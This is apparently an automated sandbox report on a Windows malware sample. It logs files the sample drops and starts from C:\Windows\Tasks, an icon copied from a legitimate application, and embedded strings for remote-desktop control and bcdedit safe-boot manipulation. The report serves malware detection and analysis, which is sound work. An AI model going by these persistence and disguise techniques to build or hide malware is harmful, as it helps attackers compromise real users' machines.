                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508DC11 push rax; ret 23_2_00007FF7E508DC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5091400 push rbp; iretd 23_2_00007FF7E5091401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E508DC01 push rcx; ret 23_2_00007FF7E508DC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507FEF1 push rcx; ret 26_2_00007FF7E507FEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50907F8 push rbp; iretd 26_2_00007FF7E50907F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50912EF push rbp; iretd 26_2_00007FF7E50912F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508DC21 push rsp; ret 26_2_00007FF7E508DC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A8CF9 push 8B481074h; iretd 26_2_00007FF7E50A8CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508DC11 push rax; ret 26_2_00007FF7E508DC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5091400 push rbp; iretd 26_2_00007FF7E5091401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E508DC01 push rcx; ret 26_2_00007FF7E508DC02

                          Persistence and Installation Behavior

                          barindex
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3EiJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\GIjul8.QTIrrrJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\gTFLK1.jBd3EiJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: GIjul8.QTIrrr.2.drBinary or memory string: bcdedit.exe
                          Source: GIjul8.QTIrrr.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: sync_browser.exe.6.drBinary or memory string: bcdedit.exe
                          Source: sync_browser.exe.6.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: bcdedit.exe
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF7E50C7650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7EB0 GetPrivateProfileIntA,23_2_00007FF7E50C7EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7D50 GetPrivateProfileIntA,23_2_00007FF7E50C7D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7E10 GetPrivateProfileIntA,23_2_00007FF7E50C7E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF7E50C78E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF7E50C7750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7F50 GetPrivateProfileIntA,23_2_00007FF7E50C7F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF7E50C77F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF7E50C9A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50781AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E507E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7C90 GetPrivateProfileIntA,23_2_00007FF7E50C7C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50C7BD0 GetPrivateProfileIntA,23_2_00007FF7E50C7BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,26_2_00007FF7E50C7650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7EB0 GetPrivateProfileIntA,26_2_00007FF7E50C7EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7D50 GetPrivateProfileIntA,26_2_00007FF7E50C7D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7E10 GetPrivateProfileIntA,26_2_00007FF7E50C7E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,26_2_00007FF7E50C78E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,26_2_00007FF7E50C7750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7F50 GetPrivateProfileIntA,26_2_00007FF7E50C7F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,26_2_00007FF7E50C77F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,26_2_00007FF7E50C9A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50781AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin26_2_00007FF7E50781AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E507E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat26_2_00007FF7E507E1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7C90 GetPrivateProfileIntA,26_2_00007FF7E50C7C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50C7BD0 GetPrivateProfileIntA,26_2_00007FF7E50C7BD0
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\5482310161066753Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Icon mismatch, binary includes an icon from a different legit application in order to fool users
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF7E50A48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E50A48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,26_2_00007FF7E50A48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50A3E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,23_2_00007FF7E50A3E20
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF7E50D9BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF7E5079D00
